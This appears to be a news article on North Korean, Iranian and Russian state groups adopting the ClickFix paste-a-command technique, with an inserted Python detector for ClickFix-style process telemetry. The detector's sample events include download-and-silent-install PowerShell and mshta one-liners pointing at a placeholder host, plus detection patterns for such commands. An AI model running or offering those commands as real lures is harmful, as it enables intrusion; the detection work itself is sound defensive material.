State-sponsored cyber groups are flocking to the 'ClickFix' social engineering technique
ClickFix is being used to target think tanks, government, and defense firms


State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering technique that shows the target a fake error or verification dialog whose "fix" is a set of instructions: copy a command, paste it into the Run dialog or a terminal, and execute it. Because the victim runs the command themselves, the attacker needs no exploit and no malicious attachment to get code running on the machine.
The technique was first observed in early March 2024, employed by initial access broker TA571 and the ClearFake cluster, but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from late 2024 into early 2025, North Korea's TA427, Iran's TA450, and Russia's UNK_RemoteRogue and TA422 have all made use of it.
"This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution," said Proofpoint.
Rather than revolutionizing their campaigns, the technique replaces the installation and execution stages of existing infection chains. While it is currently limited to a few state-sponsored groups, Proofpoint said it expects the method to be more widely tested or adopted by threat actors.
North Korea's TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Iran's TA450, meanwhile, used an attacker-controlled email address, support@microsoftonlines[.]com, to send an English-language phish to targets at more than 39 organizations in the Middle East.
The group applied ClickFix by persuading the target first to open PowerShell with administrator privileges, then to copy a command from the email body and paste it into that console. Running it installed remote monitoring and management (RMM) software, giving the group a foothold for espionage and data exfiltration from the target's machine.
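The two delivery variants described above (a one-liner pasted into the Run dialog, and the TA450 pattern of opening an elevated PowerShell console and pasting into it) leave different traces in process-creation telemetry. The following Python is an added example, not code from the article or from Proofpoint: it runs a heuristic detector over constructed Sysmon Event ID 1 / Security 4688-style records flattened to key=value lines. The events, the hostnames and the domain example.invalid (a reserved, non-resolving name) are all assumptions made for the example.

```python
"""Heuristic detection of ClickFix-style execution in Windows process-creation
telemetry (Sysmon Event ID 1 / Security 4688 records flattened to one
key=value line each). Added example, not from the article or Proofpoint; the
events below are constructed and example.invalid is a reserved, non-resolving
name, so nothing here reaches real infrastructure.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Interpreters a ClickFix lure tells the victim to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that mean a human launched the interpreter (Run dialog, Start menu,
# Explorer, Windows Terminal) rather than a script, scheduled task or service.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Second-stage tools an already-open shell spawns once the paste runs. The
# article's TA450 chain installs remote-monitoring software; a silent MSI
# install is one way that lands, the others are stock downloaders.
STAGE2_TOOLS = {"msiexec.exe", "curl.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}

# Command-line fragments typical of "paste this to fix it" one-liners.
FRAGMENTS = {
    "web-download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|downloadstring|downloadfile)\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded-command": re.compile(r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "remote-url": re.compile(r"https?://", re.I),
    "silent-msi": re.compile(r"msiexec.*\s/(i|package)\s.*\s/q", re.I),
}

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one flattened record; quoted values may contain spaces."""
    return {k: (q or u) for k, q, u in _KV.findall(line)}


@dataclass
class Finding:
    rule: str
    image: str
    parent: str
    elevated: bool
    reasons: List[str] = field(default_factory=list)


def classify(ev: Dict[str, str]) -> Optional[Finding]:
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmd", "")
    elevated = ev.get("elevated", "no").lower() == "yes"
    reasons = [name for name, rx in FRAGMENTS.items() if rx.search(cmd)]

    # Rule A, the Run-dialog variant: the victim pastes into Win+R (or a
    # terminal), so the whole one-liner is the interpreter's own command line.
    if image in INTERPRETERS and parent in INTERACTIVE_PARENTS and reasons:
        if elevated:
            reasons.append("elevated-interactive-shell")
        return Finding("clickfix-paste-into-run", image, parent, elevated, reasons)

    # Rule B, the console-paste variant (the TA450 chain): the victim opens
    # PowerShell first and pastes inside it, so powershell.exe's own command
    # line is clean and the pasted command surfaces only as its children.
    if image in STAGE2_TOOLS and parent in INTERPRETERS and reasons:
        return Finding("clickfix-stage2-from-shell", image, parent, elevated, reasons)
    return None


def detect(lines: List[str]) -> List[Finding]:
    return [f for f in (classify(parse_event(line)) for line in lines) if f is not None]


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    # 1. Win+R paste: Explorer launches PowerShell with a download-and-install one-liner.
    'ts=2025-04-02T09:14:03Z host=WS-101 parent=explorer.exe image=powershell.exe elevated=no '
    'cmd="powershell -w hidden -c iwr http://example.invalid/agent.msi -OutFile $env:TEMP\\a.msi; '
    'msiexec /i $env:TEMP\\a.msi /qn"',
    # 2. Benign interactive use: nothing to flag.
    'ts=2025-04-02T09:20:11Z host=WS-101 parent=explorer.exe image=powershell.exe elevated=no '
    'cmd="powershell Get-ChildItem C:\\Users"',
    # 3. Scripted launch from a service: outside the scope of these rules.
    'ts=2025-04-02T09:31:45Z host=WS-101 parent=svchost.exe image=powershell.exe elevated=yes '
    'cmd="powershell -NoProfile -ExecutionPolicy Bypass -File C:\\ProgramData\\Backup\\run.ps1"',
    # 4. Console-paste variant: the shell itself was opened by hand and looks clean...
    'ts=2025-04-02T10:02:09Z host=WS-102 parent=explorer.exe image=powershell.exe elevated=yes '
    'cmd="powershell.exe"',
    # 5. ...and the pasted command shows up as a silent MSI install it spawned.
    'ts=2025-04-02T10:02:41Z host=WS-102 parent=powershell.exe image=msiexec.exe elevated=yes '
    'cmd="msiexec /i C:\\Users\\j\\AppData\\Local\\Temp\\a.msi /qn"',
    # 6. mshta one-liner pasted into the Run dialog.
    'ts=2025-04-02T11:15:27Z host=WS-103 parent=explorer.exe image=mshta.exe elevated=no '
    'cmd="mshta https://example.invalid/verify.hta"',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.parent} -> {f.image} elevated={f.elevated} reasons={f.reasons}")
```

Event 4 is the deliberate blind spot: when the victim opens the console first, as in the TA450 emails, the pasted command never appears on powershell.exe's command line, and only the children it spawns (event 5) betray it. PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records the pasted body itself, and Win+R history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU records Run-dialog pastes; both complement the process-tree rules here. The interactive-parent condition is what keeps the rules narrow, so expect to allowlist administrators who legitimately paste download one-liners.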
ClickFix abuse expected to surge
UNK_RemoteRogue used ClickFix only once, researchers said, and at the time of the initial observations none of the groups had shown repeated use of the technique.
The security firm first hypothesized that this might be because the activity represented a trial period, or because the groups found the technique less successful than their usual methods at compromising machines.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe the group is refining how it uses the technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
"Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations," said the firm.
"However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time."
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.